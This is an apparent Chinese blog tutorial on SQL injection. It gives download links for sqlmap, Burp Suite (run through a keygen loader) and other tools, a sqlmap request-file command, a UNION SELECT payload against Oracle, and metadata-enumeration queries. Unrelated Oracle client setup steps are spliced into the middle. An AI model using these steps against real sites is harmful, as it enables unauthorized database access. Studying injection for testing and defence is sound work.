详细请看:https://mubu.com/doc/7m3poBzabXi

 

 

SQL注入_工具与指南

  • 使用工具:
    • sqlmap

 

      • 链接:https://pan.baidu.com/s/1xdncbzZfE864WjeHfJWTHw
        • 提取码:9vd1
    • 抓包工具:burp suite

 

 

      • 链接:https://pan.baidu.com/s/1r9KploJifmYWJM6tlsa9MA
      • 提取码:84i1(下有详细安装教程)
    • Kali镜像下载:

 

      • 链接:https://pan.baidu.com/s/1c98a42JTimSR2s5EoFcgCQ
      • 提取码:54j1
    • Nessus 漏洞扫描文件:

 

      • 链接:https://pan.baidu.com/s/1an8q6hLlyJeNZYadQ5oMKg
      • 提取码:zsk8
    • 阿D注入工具(绿色放心使用):

 

      • 链接:https://pan.baidu.com/s/1Exruns-eTs3f6bt377dUYQ
      • 提取码:gm5c
  • SQLMAP安装教程:解压,放到python对应的安装目录中(新建sqlmap文件夹)例如:

 

  • 使用POST扫描注入SQLhttps://www.cnblogs.com/php09/p/10404560.html

    • 使用busp suite 进行抓包

      • 1,推荐使用火狐浏览器,修改浏览器代理(cmd 到安装路径出入:java -Xmx2g -jar burp-loader-keygen.jar
  • 修改代理(建议8080–9999
  • 火狐修改代理
  • 抓包数据
  • 拦截包(跳转时关,获取时开)
  • 对上述的信息放到txt文档中,进行保存
  • 然后输入:python sqlmap.py -r ./workplace/test.txt -f 进行搜查
  • Busp Suite 详细使用方法可看(Web安全深度剖析)
  • 2.解压两个包将两个包的所有文件放在同一目录下
  • 3.配置sqlplus 的配置文件
  • 在步骤2的目录下新建 network/admin目录并且新建文件 tnsnames.ora
  • 4.tnsnames.ora的格式如下
  • orcl=
    • (DESCRIPTION =
    • (ADDRESS_LIST=
    • (ADDRESS=(PROTOCOL = TCP)(HOST = 192.168.62.200)(PORT = 1521))
    • )
    • (CONNECT_DATA =
    • (SERVER = DEDICATED)
    • (SERVICE_NAME = 198.168.62.200BT)
    • )
    • 5.可以设置将当前目录加入path 环境变量中以方便操作系统查找 sqlplus.exe 的运行程序
    • 最后输入
  • 大致语句注入方法(以新闻资讯为例):

    • 1,在网页中找到form/ajax(看到他的servlet位置)
  • 最终找到相应的dao层代码和他的sql语句
  • “select id, Theme,NETTIME,CREATE_TIME from (select id, Theme,CREATE_TIME,NETTIME from “+classname+” where show1=1 order by CREATE_TIME desc, NETTIME desc ) where rownum<=10″;
  • 可知他的classname为注入点
  • Union方法

    • 在网址链接中加入 union select null,null,null,null ……. from dual
  • 简单获取元数据

    • 查看表空间
    • select tablespace_name from user_tablespaces;
    • 查看当前用户所有表
    • select table_name from user_tables ;
    • 查看当前用户所有列
    • select column_name from user_tab_columns where table_name=\’NEWS_INFORMATION\’;
    • 查看当前用户所有对象(表明、约束、索引)
    • select object_name from user_objects;
    • 后可通过暴力猜解(通常用软件)
  • 阿D注入工具(巨简单):
    • 可见其注入点
  • 百度教程即可:

版权声明:本文为smartisn原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/smartisn/p/13979020.html